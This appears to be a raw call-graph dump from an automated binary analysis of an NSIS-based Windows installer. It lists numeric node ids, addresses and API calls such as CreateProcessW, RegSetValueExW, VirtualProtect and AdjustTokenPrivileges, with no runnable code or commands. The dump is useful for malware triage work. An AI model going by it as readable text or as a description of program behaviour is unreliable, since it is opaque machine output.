4580->4587 4581 40273c 4581->4579 4581->4587 4591 405e5b SetFilePointer 4581->4591 4582 405dfd ReadFile 4582->4587 4584 4026e3 MultiByteToWideChar 4584->4587 4585 402798 4600 4061cb wsprintfW 4585->4600 4587->4579 4587->4580 4587->4581 4587->4582 4587->4584 4587->4585 4588 402709 SetFilePointer MultiByteToWideChar 4587->4588 4589 4027a9 4587->4589 4588->4587 4589->4579 4590 4027ca SetFilePointer 4589->4590 4590->4579 4592 405e77 4591->4592 4597 405e8f 4591->4597 4593 405dfd ReadFile 4592->4593 4594 405e83 4593->4594 4595 405ec0 SetFilePointer 4594->4595 4596 405e98 SetFilePointer 4594->4596 4594->4597 4595->4597 4596->4595 4598 405ea3 4596->4598 4597->4581 4599 405e2c WriteFile 4598->4599 4599->4597 4600->4579 5254 4016cc 5255 402c41 17 API calls 5254->5255 5256 4016d2 GetFullPathNameW 5255->5256 5257 4016ec 5256->5257 5263 40170e 5256->5263 5259 4065c7 2 API calls 5257->5259 5257->5263 5258 401723 GetShortPathNameW 5260 402ac5 5258->5260 5261 4016fe 5259->5261 5261->5263 5264 406284 lstrcpynW 5261->5264 5263->5258 5263->5260 5264->5263 5265 705018dd 5267 70501900 5265->5267 5266 70501947 5269 70501272 2 API calls 5266->5269 5267->5266 5268 70501935 GlobalFree 5267->5268 5268->5266 5270 70501ad2 GlobalFree GlobalFree 5269->5270 5271 40234e 5272 402c41 17 API calls 5271->5272 5273 40235d 5272->5273 5274 402c41 17 API calls 5273->5274 5275 402366 5274->5275 5276 402c41 17 API calls 5275->5276 5277 402370 GetPrivateProfileStringW 5276->5277 5278 401b53 5279 402c41 17 API calls 5278->5279 5280 401b5a 5279->5280 5281 402c1f 17 API calls 5280->5281 5282 401b63 wsprintfW 5281->5282 5283 402ac5 5282->5283 5284 401956 5285 402c41 17 API calls 5284->5285 5286 40195d lstrlenW 5285->5286 5287 402592 5286->5287 5288 4014d7 5289 402c1f 17 API calls 5288->5289 5290 4014dd Sleep 5289->5290 5292 402ac5 5290->5292 5293 401f58 5294 402c41 17 API calls 5293->5294 5295 401f5f 5294->5295 5296 4065c7 2 API calls 5295->5296 5297 401f65 5296->5297 5299 401f76 5297->5299 5300 4061cb wsprintfW 5297->5300 5300->5299 4931 403359 SetErrorMode GetVersion 4932 403398 4931->4932 4933 40339e 4931->4933 4934 40665e 5 API calls 4932->4934 4935 4065ee 3 API calls 4933->4935 4934->4933 4936 4033b4 lstrlenA 4935->4936 4936->4933 4937 4033c4 4936->4937 4938 40665e 5 API calls 4937->4938 4939 4033cb 4938->4939 4940 40665e 5 API calls 4939->4940 4941 4033d2 4940->4941 4942 40665e 5 API calls 4941->4942 4943 4033de #17 OleInitialize SHGetFileInfoW 4942->4943 5021 406284 lstrcpynW 4943->5021 4946 40342a GetCommandLineW 5022 406284 lstrcpynW 4946->5022 4948 40343c 4949 405b86 CharNextW 4948->4949 4950 403461 CharNextW 4949->4950 4951 40358b GetTempPathW 4950->4951 4961 40347a 4950->4961 5023 403328 4951->5023 4953 4035a3 4954 4035a7 GetWindowsDirectoryW lstrcatW 4953->4954 4955 4035fd DeleteFileW 4953->4955 4956 403328 12 API calls 4954->4956 5033 402edd GetTickCount GetModuleFileNameW 4955->5033 4959 4035c3 4956->4959 4957 405b86 CharNextW 4957->4961 4959->4955 4962 4035c7 GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 4959->4962 4960 403611 4963 4036c4 4960->4963 4967 4036b4 4960->4967 4972 405b86 CharNextW 4960->4972 4961->4957 4965 403576 4961->4965 4966 403574 4961->4966 4964 403328 12 API calls 4962->4964 5120 40389a 4963->5120 4970 4035f5 4964->4970 5117 406284 lstrcpynW 4965->5117 4966->4951 5061 403974 4967->5061 4970->4955 4970->4963 4988 403630 4972->4988 4974 4037fe 4977 403882 ExitProcess 4974->4977 4978 403806 GetCurrentProcess OpenProcessToken 4974->4978 4975 4036de 4976 4058ea MessageBoxIndirectW 4975->4976 4980 4036ec ExitProcess 4976->4980 4983 403852 4978->4983 4984 40381e LookupPrivilegeValueW AdjustTokenPrivileges 4978->4984 4981 4036f4 4986 405855 5 API calls 4981->4986 4982 40368e 4985 405c61 18 API calls 4982->4985 4987 40665e 5 API calls 4983->4987 4984->4983 4989 40369a 4985->4989 4990 4036f9 lstrcatW 4986->4990 4991 403859 4987->4991 4988->4981 4988->4982 4989->4963 5118 406284 lstrcpynW 4989->5118 4992 403715 lstrcatW lstrcmpiW 4990->4992 4993 40370a lstrcatW 4990->4993 4994 40386e ExitWindowsEx 4991->4994 4997 40387b 4991->4997 4992->4963 4996 403731 4992->4996 4993->4992 4994->4977 4994->4997 5000 403736 4996->5000 5001 40373d 4996->5001 4998 40140b 2 API calls 4997->4998 4998->4977 4999 4036a9 5119 406284 lstrcpynW 4999->5119 5003 4057bb 4 API calls 5000->5003 5004 405838 2 API calls 5001->5004 5005 40373b 5003->5005 5006 403742 SetCurrentDirectoryW 5004->5006 5005->5006 5007 403752 5006->5007 5008 40375d 5006->5008 5127 406284 lstrcpynW 5007->5127 5128 406284 lstrcpynW 5008->5128 5011 4062a6 17 API calls 5012 40379c DeleteFileW 5011->5012 5013 4037a9 CopyFileW 5012->5013 5018 40376b 5012->5018 5013->5018 5014 4037f2 5015 40604a 36 API calls 5014->5015 5015->4963 5016 40604a 36 API calls 5016->5018 5017 4062a6 17 API calls 5017->5018 5018->5011 5018->5014 5018->5016 5018->5017 5020 4037dd CloseHandle 5018->5020 5129 40586d CreateProcessW 5018->5129 5020->5018 5021->4946 5022->4948 5024 406518 5 API calls 5023->5024 5025 403334 5024->5025 5026 40333e 5025->5026 5027 405b59 3 API calls 5025->5027 5026->4953 5028 403346 5027->5028 5029 405838 2 API calls 5028->5029 5030 40334c 5029->5030 5132 405da9 5030->5132 5136 405d7a GetFileAttributesW CreateFileW 5033->5136 5035 402f1d 5055 402f2d 5035->5055 5137 406284 lstrcpynW 5035->5137 5037 402f43 5038 405ba5 2 API calls 5037->5038 5039 402f49 5038->5039 5138 406284 lstrcpynW 5039->5138 5041 402f54 GetFileSize 5042 403050 5041->5042 5060 402f6b 5041->5060 5139 402e79 5042->5139 5044 403059 5046 403089 GlobalAlloc 5044->5046 5044->5055 5151 403311 SetFilePointer 5044->5151 5045 4032fb ReadFile 5045->5060 5150 403311 SetFilePointer 5046->5150 5048 4030bc 5052 402e79 6 API calls 5048->5052 5050 403072 5053 4032fb ReadFile 5050->5053 5051 4030a4 5054 403116 35 API calls 5051->5054 5052->5055 5056 40307d 5053->5056 5058 4030b0 5054->5058 5055->4960 5056->5046 5056->5055 5057 402e79 6 API calls 5057->5060 5058->5055 5058->5058 5059 4030ed SetFilePointer 5058->5059 5059->5055 5060->5042 5060->5045 5060->5048 5060->5055 5060->5057 5062 40665e 5 API calls 5061->5062 5063 403988 5062->5063 5064 4039a0 5063->5064 5065 40398e 5063->5065 5066 406152 3 API calls 5064->5066 5164 4061cb wsprintfW 5065->5164 5067 4039d0 5066->5067 5069 4039ef lstrcatW 5067->5069 5071 406152 3 API calls 5067->5071 5070 40399e 5069->5070 5156 403c4a 5070->5156 5071->5069 5074 405c61 18 API calls 5075 403a21 5074->5075 5076 403ab5 5075->5076 5078 406152 3 API calls 5075->5078 5077 405c61 18 API calls 5076->5077 5079 403abb 5077->5079 5080 403a53 5078->5080 5081 403acb LoadImageW 5079->5081 5082 4062a6 17 API calls 5079->5082 5080->5076 5085 403a74 lstrlenW 5080->5085 5088 405b86 CharNextW 5080->5088 5083 403b71 5081->5083 5084 403af2 RegisterClassW 5081->5084 5082->5081 5087 40140b 2 API calls 5083->5087 5086 403b28 SystemParametersInfoW CreateWindowExW 5084->5086 5116 403b7b 5084->5116 5089 403a82 lstrcmpiW 5085->5089 5090 403aa8 5085->5090 5086->5083 5091 403b77 5087->5091 5093 403a71 5088->5093 5089->5090 5094 403a92 GetFileAttributesW 5089->5094 5092 405b59 3 API calls 5090->5092 5095 403c4a 18 API calls 5091->5095 5091->5116 5096 403aae 5092->5096 5093->5085 5097 403a9e 5094->5097 5098 403b88 5095->5098 5165 406284 lstrcpynW 5096->5165 5097->5090 5100 405ba5 2 API calls 5097->5100 5101 403b94 ShowWindow 5098->5101 5102 403c17 5098->5102 5100->5090 5104 4065ee 3 API calls 5101->5104 5103 4053bf 5 API calls 5102->5103 5105 403c1d 5103->5105 5106 403bac 5104->5106 5107 403c21 5105->5107 5108 403c39 5105->5108 5109 403bba GetClassInfoW 5106->5109 5111 4065ee 3 API calls 5106->5111 5114 40140b 2 API calls 5107->5114 5107->5116 5110 40140b 2 API calls 5108->5110 5112 403be4 DialogBoxParamW 5109->5112 5113 403bce GetClassInfoW RegisterClassW 5109->5113 5110->5116 5111->5109 5115 40140b 2 API calls 5112->5115 5113->5112 5114->5116 5115->5116 5116->4963 5117->4966 5118->4999 5119->4967 5121 4038b2 5120->5121 5122 4038a4 CloseHandle 5120->5122 5167 4038df 5121->5167 5122->5121 5125 405996 67 API calls 5126 4036cd OleUninitialize 5125->5126 5126->4974 5126->4975 5127->5008 5128->5018 5130 4058a0 CloseHandle 5129->5130 5131 4058ac 5129->5131 5130->5131 5131->5018 5133 405db6 GetTickCount GetTempFileNameW 5132->5133 5134 403357 5133->5134 5135 405dec 5133->5135 5134->4953 5135->5133 5135->5134 5136->5035 5137->5037 5138->5041 5140 402e82 5139->5140 5141 402e9a 5139->5141 5142 402e92 5140->5142 5143 402e8b DestroyWindow 5140->5143 5144 402ea2 5141->5144 5145 402eaa GetTickCount 5141->5145 5142->5044 5143->5142 5152 40669a 5144->5152 5147 402eb8 CreateDialogParamW ShowWindow 5145->5147 5148 402edb 5145->5148 5147->5148 5148->5044 5150->5051 5151->5050 5153 4066b7 PeekMessageW 5152->5153 5154 402ea8 5153->5154 5155 4066ad DispatchMessageW 5153->5155 5154->5044 5155->5153 5157 403c5e 5156->5157 5166 4061cb wsprintfW 5157->5166 5159 403ccf 5160 403d03 18 API calls 5159->5160 5162 403cd4 5160->5162 5161 4039ff 5161->5074 5162->5161 5163 4062a6 17 API calls 5162->5163 5163->5162 5164->5070 5165->5076 5166->5159 5168 4038ed 5167->5168 5169 4038b7 5168->5169 5170 4038f2 FreeLibrary GlobalFree 5168->5170 5169->5125 5170->5169 5170->5170 5301 402259 5302 402c41 17 API calls 5301->5302 5303 40225f 5302->5303 5304 402c41 17 API calls 5303->5304 5305 402268 5304->5305 5306 402c41 17 API calls 5305->5306 5307 402271 5306->5307 5308 4065c7 2 API calls 5307->5308 5309 40227a 5308->5309 5310 40228b lstrlenW lstrlenW 5309->5310 5311 40227e 5309->5311 5313 4052ec 24 API calls 5310->5313 5312 4052ec 24 API calls 5311->5312 5315 402286 5312->5315 5314 4022c9 SHFileOperationW 5313->5314 5314->5311 5314->5315 5171 40175c 5172 402c41 17 API calls 5171->5172 5173 401763 5172->5173 5174 405da9 2 API calls 5173->5174 5175 40176a 5174->5175 5176 405da9 2 API calls 5175->5176 5176->5175 5323 401d5d GetDlgItem GetClientRect 5324 402c41 17 API calls 5323->5324 5325 401d8f LoadImageW SendMessageW 5324->5325 5326 401dad DeleteObject 5325->5326 5327 402ac5 5325->5327 5326->5327 5328 4022dd 5329 4022e4 5328->5329 5332 4022f7 5328->5332 5330 4062a6 17 API calls 5329->5330 5331 4022f1 5330->5331 5333 4058ea MessageBoxIndirectW 5331->5333 5333->5332 5334 70502c4f 5335 70502c67 5334->5335 5336 7050158f 2 API calls 5335->5336 5337 70502c82 5336->5337 5338 405260 5339 405270 5338->5339 5340 405284 5338->5340 5341 405276 5339->5341 5350 4052cd 5339->5350 5342 40528c IsWindowVisible 5340->5342 5348 4052a3 5340->5348 5344 404247 SendMessageW 5341->5344 5345 405299 5342->5345 5342->5350 5343 4052d2 CallWindowProcW 5346 405280 5343->5346 5344->5346 5351 404bb6 SendMessageW 5345->5351 5348->5343 5356 404c36 5348->5356 5350->5343 5352 404c15 SendMessageW 5351->5352 5353 404bd9 GetMessagePos ScreenToClient SendMessageW 5351->5353 5354 404c0d 5352->5354 5353->5354 5355 404c12 5353->5355 5354->5348 5355->5352 5365 406284 lstrcpynW 5356->5365 5358 404c49 5366 4061cb wsprintfW 5358->5366 5360 404c53 5361 40140b 2 API calls 5360->5361 5362 404c5c 5361->5362 5367 406284 lstrcpynW 5362->5367 5364 404c63 5364->5350 5365->5358 5366->5360 5367->5364 5368 70501671 5369 70501516 GlobalFree 5368->5369 5371 70501689 5369->5371 5370 705016cf GlobalFree 5371->5370 5372 705016a4 5371->5372 5373 705016bb VirtualFree 5371->5373 5372->5370 5373->5370 5374 401563 5375 402a6b 5374->5375 5378 4061cb wsprintfW 5375->5378 5377 402a70 5378->5377 4489 4023e4 4490 402c41 17 API calls 4489->4490 4491 4023f6 4490->4491 4492 402c41 17 API calls 4491->4492 4493 402400 4492->4493 4506 402cd1 4493->4506 4496 402438 4498 402444 4496->4498 4510 402c1f 4496->4510 4497 402c41 17 API calls 4500 40242e lstrlenW 4497->4500 4502 402463 RegSetValueExW 4498->4502 4513 403116 4498->4513 4499 40288b 4500->4496 4503 402479 RegCloseKey 4502->4503 4503->4499 4507 402cec 4506->4507 4534 40611f 4507->4534 4511 4062a6 17 API calls 4510->4511 4512 402c34 4511->4512 4512->4498 4514 40312f 4513->4514 4515 40315a 4514->4515 4548 403311 SetFilePointer 4514->4548 4538 4032fb 4515->4538 4519 403177 GetTickCount 4530 40318a 4519->4530 4520 40329b 4521 40329f 4520->4521 4526 4032b7 4520->4526 4523 4032fb ReadFile 4521->4523 4522 403285 4522->4502 4523->4522 4524 4032fb ReadFile 4524->4526 4525 4032fb ReadFile 4525->4530 4526->4522 4526->4524 4527 405e2c WriteFile 4526->4527 4527->4526 4529 4031f0 GetTickCount 4529->4530 4530->4522 4530->4525 4530->4529 4531 403219 MulDiv wsprintfW 4530->4531 4533 405e2c WriteFile 4530->4533 4541 4067df 4530->4541 4532 4052ec 24 API calls 4531->4532 4532->4530 4533->4530 4535 40612e 4534->4535 4536 402410 4535->4536 4537 406139 RegCreateKeyExW 4535->4537 4536->4496 4536->4497 4536->4499 4537->4536 4539 405dfd ReadFile 4538->4539 4540 403165 4539->4540 4540->4519 4540->4520 4540->4522 4542 406804 4541->4542 4543 40680c 4541->4543 4542->4530 4543->4542 4544 406893 GlobalFree 4543->4544 4545 40689c GlobalAlloc 4543->4545 4546 406913 GlobalAlloc 4543->4546 4547 40690a GlobalFree 4543->4547 4544->4545 4545->4542 4545->4543 4546->4542 4546->4543 4547->4546 4548->4515 5379 404c68 GetDlgItem GetDlgItem 5380 404cba 7 API calls 5379->5380 5392 404ed3 5379->5392 5381 404d50 SendMessageW 5380->5381 5382 404d5d DeleteObject 5380->5382 5381->5382 5383 404d66 5382->5383 5385 404d9d 5383->5385 5386 4062a6 17 API calls 5383->5386 5384 404fb7 5388 405063 5384->5388 5394 404ec6 5384->5394 5399 405010 SendMessageW 5384->5399 5387 4041fb 18 API calls 5385->5387 5389 404d7f SendMessageW SendMessageW 5386->5389 5393 404db1 5387->5393 5390 405075 5388->5390 5391 40506d SendMessageW 5388->5391 5389->5383 5401 405087 ImageList_Destroy 5390->5401 5402 40508e 5390->5402 5410 40509e 5390->5410 5391->5390 5392->5384 5397 404bb6 5 API calls 5392->5397 5413 404f44 5392->5413 5398 4041fb 18 API calls 5393->5398 5395 404262 8 API calls 5394->5395 5400 405259 5395->5400 5396 404fa9 SendMessageW 5396->5384 5397->5413 5414 404dbf 5398->5414 5399->5394 5404 405025 SendMessageW 5399->5404 5401->5402 5405 405097 GlobalFree 5402->5405 5402->5410 5403 40520d 5403->5394 5408 40521f ShowWindow GetDlgItem ShowWindow 5403->5408 5407 405038 5404->5407 5405->5410 5406 404e94 GetWindowLongW SetWindowLongW 5409 404ead 5406->5409 5415 405049 SendMessageW 5407->5415 5408->5394 5411 404eb3 ShowWindow 5409->5411 5412 404ecb 5409->5412 5410->5403 5420 404c36 4 API calls 5410->5420 5423 4050d9 5410->5423 5430 404230 SendMessageW 5411->5430 5431 404230 SendMessageW 5412->5431 5413->5384 5413->5396 5414->5406 5416 404e8e 5414->5416 5419 404e0f SendMessageW 5414->5419 5421 404e4b SendMessageW 5414->5421 5422 404e5c SendMessageW 5414->5422 5415->5388 5416->5406 5416->5409 5419->5414 5420->5423 5421->5414 5422->5414 5425 40511d 5423->5425 5426 405107 SendMessageW 5423->5426 5424 4051e3 InvalidateRect 5424->5403 5427 4051f9 5424->5427 5425->5424 5429 405191 SendMessageW SendMessageW 5425->5429 5426->5425 5432 404b71 5427->5432 5429->5425 5430->5394 5431->5392 5435 404aa8 5432->5435 5434 404b86 5434->5403 5436 404ac1 5435->5436 5437 4062a6 17 API calls 5436->5437 5438 404b25 5437->5438 5439 4062a6 17 API calls 5438->5439 5440 404b30 5439->5440 5441 4062a6 17 API calls 5440->5441 5442 404b46 lstrlenW wsprintfW SetDlgItemTextW 5441->5442 5442->5434 5443 402868 5444 402c41 17 API calls 5443->5444 5445 40286f FindFirstFileW 5444->5445 5446 402882 5445->5446 5447 402897 5445->5447 5451 4061cb wsprintfW 5447->5451 5449 4028a0 5452 406284 lstrcpynW 5449->5452 5451->5449 5452->5446 5453 401968 5454 402c1f 17 API calls 5453->5454 5455 40196f 5454->5455 5456 402c1f 17 API calls 5455->5456 5457 40197c 5456->5457 5458 402c41 17 API calls 5457->5458 5459 401993 lstrlenW 5458->5459 5461 4019a4 5459->5461 5460 4019e5 5461->5460 5465 406284 lstrcpynW 5461->5465 5463 4019d5 5463->5460 5464 4019da lstrlenW 5463->5464 5464->5460 5465->5463 5466 40166a 5467 402c41 17 API calls 5466->5467 5468 401670 5467->5468 5469 4065c7 2 API calls 5468->5469 5470 401676 5469->5470 5471 40436b lstrlenW 5472 40438a 5471->5472 5473 40438c WideCharToMultiByte 5471->5473 5472->5473 5474 4046ec 5475 404718 5474->5475 5476 404729 5474->5476 5535 4058ce GetDlgItemTextW 5475->5535 5478 404735 GetDlgItem 5476->5478 5484 404794 5476->5484 5480 404749 5478->5480 5479 404723 5482 406518 5 API calls 5479->5482 5483 40475d SetWindowTextW 5480->5483 5488 405c04 4 API calls 5480->5488 5481 404878 5485 404a27 5481->5485 5537 4058ce GetDlgItemTextW 5481->5537 5482->5476 5489 4041fb 18 API calls 5483->5489 5484->5481 5484->5485 5490 4062a6 17 API calls 5484->5490 5487 404262 8 API calls 5485->5487 5492 404a3b 5487->5492 5493 404753 5488->5493 5494 404779 5489->5494 5495 404808 SHBrowseForFolderW 5490->5495 5491 4048a8 5496 405c61 18 API calls 5491->5496 5493->5483 5502 405b59 3 API calls 5493->5502 5497 4041fb 18 API calls 5494->5497 5495->5481 5498 404820 CoTaskMemFree 5495->5498 5499 4048ae 5496->5499 5500 404787 5497->5500 5501 405b59 3 API calls 5498->5501 5538 406284 lstrcpynW 5499->5538 5536 404230 SendMessageW 5500->5536 5504 40482d 5501->5504 5502->5483 5507 404864 SetDlgItemTextW 5504->5507 5511 4062a6 17 API calls 5504->5511 5506 40478d 5509 40665e 5 API calls 5506->5509 5507->5481 5508 4048c5 5510 40665e 5 API calls 5508->5510 5509->5484 5518 4048cc 5510->5518 5512 40484c lstrcmpiW 5511->5512 5512->5507 5515 40485d lstrcatW 5512->5515 5513 40490d 5539 406284 lstrcpynW 5513->5539 5515->5507 5516 404914 5517 405c04 4 API calls 5516->5517 5519 40491a GetDiskFreeSpaceW 5517->5519 5518->5513 5522 405ba5 2 API calls 5518->5522 5524 404965 5518->5524 5521 40493e MulDiv 5519->5521 5519->5524 5521->5524 5522->5518 5523 4049d6 5526 4049f9 5523->5526 5528 40140b 2 API calls 5523->5528 5524->5523 5525 404b71 20 API calls 5524->5525 5527 4049c3 5525->5527 5540 40421d KiUserCallbackDispatcher 5526->5540 5529 4049d8 SetDlgItemTextW 5527->5529 5530 4049c8 5527->5530 5528->5526 5529->5523 5533 404aa8 20 API calls 5530->5533 5532 404a15 5532->5485 5541 404645 5532->5541 5533->5523 5535->5479 5536->5506 5537->5491 5538->5508 5539->5516 5540->5532 5542 404653 5541->5542 5543 404658 SendMessageW 5541->5543 5542->5543 5543->5485 4667 40176f 4668 402c41 17 API calls 4667->4668 4669 401776 4668->4669 4670 401796 4669->4670 4671 40179e 4669->4671 4707 406284 lstrcpynW 4670->4707 4708 406284 lstrcpynW 4671->4708 4674 40179c 4678 406518 5 API calls 4674->4678 4675 4017a9 4676 405b59 3 API calls 4675->4676 4677 4017af lstrcatW 4676->4677 4677->4674 4683 4017bb 4678->4683 4679 4017f7 4681 405d55 2 API calls 4679->4681 4680 4065c7 2 API calls 4680->4683 4681->4683 4683->4679 4683->4680 4684 4017cd CompareFileTime 4683->4684 4685 40188d 4683->4685 4688 406284 lstrcpynW 4683->4688 4694 4062a6 17 API calls 4683->4694 4703 401864 4683->4703 4706 405d7a GetFileAttributesW CreateFileW 4683->4706 4709 4058ea 4683->4709 4684->4683 4686 4052ec 24 API calls 4685->4686 4689 401897 4686->4689 4687 4052ec 24 API calls 4705 401879 4687->4705 4688->4683 4690 403116 35 API calls 4689->4690 4691 4018aa 4690->4691 4692 4018be SetFileTime 4691->4692 4693 4018d0 CloseHandle 4691->4693 4692->4693 4695 4018e1 4693->4695 4693->4705 4694->4683 4696 4018e6 4695->4696 4697 4018f9 4695->4697 4698 4062a6 17 API calls 4696->4698 4699 4062a6 17 API calls 4697->4699 4701 4018ee lstrcatW 4698->4701 4702 401901 4699->4702 4701->4702 4704 4058ea MessageBoxIndirectW 4702->4704 4703->4687 4703->4705 4704->4705 4706->4683 4707->4674 4708->4675 4712 4058ff 4709->4712 4710 40594b 4710->4683 4711 405913 MessageBoxIndirectW 4711->4710 4712->4710 4712->4711 4713 4027ef 4714 4027f6 4713->4714 4716 402a70 4713->4716 4715 402c1f 17 API calls 4714->4715 4717 4027fd 4715->4717 4718 40280c SetFilePointer 4717->4718 4718->4716 4719 40281c 4718->4719 4721 4061cb wsprintfW 4719->4721 4721->4716 5544 705010e1 5545 70501111 5544->5545 5546 705011d8 GlobalFree 5545->5546 5547 705012ba 2 API calls 5545->5547 5548 705011d3 5545->5548 5549 70501272 2 API calls 5545->5549 5550 70501164 GlobalAlloc 5545->5550 5551 705011f8 GlobalFree 5545->5551 5552 705011c4 GlobalFree 5545->5552 5553 705012e1 lstrcpyW 5545->5553 5547->5545 5548->5546 5549->5552 5550->5545 5551->5545 5552->5545 5553->5545 5554 401a72 5555 402c1f 17 API calls 5554->5555 5556 401a7b 5555->5556 5557 402c1f 17 API calls 5556->5557 5558 401a20 5557->5558 5566 401573 5567 401583 ShowWindow 5566->5567 5568 40158c 5566->5568 5567->5568 5569 402ac5 5568->5569 5570 40159a ShowWindow 5568->5570 5570->5569 5571 401cf3 5572 402c1f 17 API calls 5571->5572 5573 401cf9 IsWindow 5572->5573 5574 401a20 5573->5574 5575 402df3 5576 402e05 SetTimer 5575->5576 5577 402e1e 5575->5577 5576->5577 5578 402e73 5577->5578 5579 402e38 MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 5577->5579 5579->5578 5580 4014f5 SetForegroundWindow 5581 402ac5 5580->5581 5582 402576 5583 402c41 17 API calls 5582->5583 5584 40257d 5583->5584 5587 405d7a GetFileAttributesW CreateFileW 5584->5587 5586 402589 5587->5586 4908 401b77 4909 401b84 4908->4909 4910 401bc8 4908->4910 4911 401c0d 4909->4911 4916 401b9b 4909->4916 4912 401bf2 GlobalAlloc 4910->4912 4913 401bcd 4910->4913 4915 4062a6 17 API calls 4911->4915 4922 4022f7 4911->4922 4914 4062a6 17 API calls 4912->4914 4913->4922 4929 406284 lstrcpynW 4913->4929 4914->4911 4917 4022f1 4915->4917 4927 406284 lstrcpynW 4916->4927 4923 4058ea MessageBoxIndirectW 4917->4923 4920 401bdf GlobalFree 4920->4922 4921 401baa 4928 406284 lstrcpynW 4921->4928 4923->4922 4925 401bb9 4930 406284 lstrcpynW 4925->4930 4927->4921 4928->4925 4929->4920 4930->4922 5588 4024f8 5589 402c81 17 API calls 5588->5589 5590 402502 5589->5590 5591 402c1f 17 API calls 5590->5591 5592 40250b 5591->5592 5593 402533 RegEnumValueW 5592->5593 5594 402527 RegEnumKeyW 5592->5594 5596 40288b 5592->5596 5595 402548 RegCloseKey 5593->5595 5594->5595 5595->5596 5598 40167b 5599 402c41 17 API calls 5598->5599 5600 401682 5599->5600 5601 402c41 17 API calls 5600->5601 5602 40168b 5601->5602 5603 402c41 17 API calls 5602->5603 5604 401694 MoveFileW 5603->5604 5605 4016a0 5604->5605 5606 4016a7 5604->5606 5608 401423 24 API calls 5605->5608 5607 4065c7 2 API calls 5606->5607 5610 402250 5606->5610 5609 4016b6 5607->5609 5608->5610 5609->5610 5611 40604a 36 API calls 5609->5611 5611->5605 5612 401e7d 5613 402c41 17 API calls 5612->5613 5614 401e83 5613->5614 5615 402c41 17 API calls 5614->5615 5616 401e8c 5615->5616 5617 402c41 17 API calls 5616->5617 5618 401e95 5617->5618 5619 402c41 17 API calls 5618->5619 5620 401e9e 5619->5620 5621 401423 24 API calls 5620->5621 5622 401ea5 5621->5622 5629 4058b0 ShellExecuteExW 5622->5629 5624 401ee7 5627 40288b 5624->5627 5630 40670f WaitForSingleObject 5624->5630 5626 401f01 CloseHandle 5626->5627 5629->5624 5631 406729 5630->5631 5632 40673b GetExitCodeProcess 5631->5632 5633 40669a 2 API calls 5631->5633 5632->5626 5634 406730 WaitForSingleObject 5633->5634 5634->5631 5635 4019ff 5636 402c41 17 API calls 5635->5636 5637 401a06 5636->5637 5638 402c41 17 API calls 5637->5638 5639 401a0f 5638->5639 5640 401a16 lstrcmpiW 5639->5640 5641 401a28 lstrcmpW 5639->5641 5642 401a1c 5640->5642 5641->5642 5643 401000 5644 401037 BeginPaint GetClientRect 5643->5644 5645 40100c DefWindowProcW 5643->5645 5647 4010f3 5644->5647 5648 401179 5645->5648 5649 401073 CreateBrushIndirect FillRect DeleteObject 5647->5649 5650 4010fc 5647->5650 5649->5647 5651 401102 CreateFontIndirectW 5650->5651 5652 401167 EndPaint 5650->5652 5651->5652 5653 401112 6 API calls 5651->5653 5652->5648 5653->5652 5661 401503 5662 40150b 5661->5662 5664 40151e 5661->5664 5663 402c1f 17 API calls 5662->5663 5663->5664 4549 402484 4560 402c81 4549->4560 4552 402c41 17 API calls 4553 402497 4552->4553 4554 4024a2 RegQueryValueExW 4553->4554 4559 40288b 4553->4559 4555 4024c8 RegCloseKey 4554->4555 4556 4024c2 4554->4556 4555->4559 4556->4555 4565 4061cb wsprintfW 4556->4565 4561 402c41 17 API calls 4560->4561 4562 402c98 4561->4562 4563 4060f1 RegOpenKeyExW 4562->4563 4564 40248e 4563->4564 4564->4552 4565->4555 5665 402104 5666 402c41 17 API calls 5665->5666 5667 40210b 5666->5667 5668 402c41 17 API calls 5667->5668 5669 402115 5668->5669 5670 402c41 17 API calls 5669->5670 5671 40211f 5670->5671 5672 402c41 17 API calls 5671->5672 5673 402129 5672->5673 5674 402c41 17 API calls 5673->5674 5676 402133 5674->5676 5675 402172 CoCreateInstance 5680 402191 5675->5680 5676->5675 5677 402c41 17 API calls 5676->5677 5677->5675 5678 401423 24 API calls 5679 402250 5678->5679 5680->5678 5680->5679 5681 401f06 5682 402c41 17 API calls 5681->5682 5683 401f0c 5682->5683 5684 4052ec 24 API calls 5683->5684 5685 401f16 5684->5685 5686 40586d 2 API calls 5685->5686 5687 401f1c 5686->5687 5688 401f3f CloseHandle 5687->5688 5690 40670f 5 API calls 5687->5690 5692 40288b 5687->5692 5688->5692 5691 401f31 5690->5691 5691->5688 5694 4061cb wsprintfW 5691->5694 5694->5688 4566 70502997 4567 705029e7 4566->4567 4568 705029a7 VirtualProtect 4566->4568 4568->4567 4657 40230c 4658 402314 4657->4658 4659 40231a 4657->4659 4660 402c41 17 API calls 4658->4660 4661 402328 4659->4661 4662 402c41 17 API calls 4659->4662 4660->4659 4663 402c41 17 API calls 4661->4663 4665 402336 4661->4665 4662->4661 4663->4665 4664 402c41 17 API calls 4666 40233f WritePrivateProfileStringW 4664->4666 4665->4664 5695 40190c 5696 401943 5695->5696 5697 402c41 17 API calls 5696->5697 5698 401948 5697->5698 5699 405996 67 API calls 5698->5699 5700 401951 5699->5700 5701 401f8c 5702 402c41 17 API calls 5701->5702 5703 401f93 5702->5703 5704 40665e 5 API calls 5703->5704 5705 401fa2 5704->5705 5706 401fbe GlobalAlloc 5705->5706 5708 402026 5705->5708 5707 401fd2 5706->5707 5706->5708 5709 40665e 5 API calls 5707->5709 5710 401fd9 5709->5710 5711 40665e 5 API calls 5710->5711 5712 401fe3 5711->5712 5712->5708 5716 4061cb wsprintfW 5712->5716 5714 402018 5717 4061cb wsprintfW 5714->5717 5716->5714 5717->5708 5718 40238e 5719 4023c1 5718->5719 5720 402396 5718->5720 5721 402c41 17 API calls 5719->5721 5722 402c81 17 API calls 5720->5722 5723 4023c8 5721->5723 5724 40239d 5722->5724 5729 402cff 5723->5729 5726 402c41 17 API calls 5724->5726 5727 4023d5 5724->5727 5728 4023ae RegDeleteValueW RegCloseKey 5726->5728 5728->5727 5730 402d0c 5729->5730 5731 402d13 5729->5731 5730->5727 5731->5730 5733 402d44 5731->5733 5734 4060f1 RegOpenKeyExW 5733->5734 5735 402d72 5734->5735 5736 402d98 RegEnumKeyW 5735->5736 5737 402daf RegCloseKey 5735->5737 5738 402dd0 RegCloseKey 5735->5738 5740 402d44 6 API calls 5735->5740 5743 402dc3 5735->5743 5736->5735 5736->5737 5739 40665e 5 API calls 5737->5739 5738->5743 5741 402dbf 5739->5741 5740->5735 5742 402de0 RegDeleteKeyW 5741->5742 5741->5743 5742->5743 5743->5730 5744 40698e 5745 406812 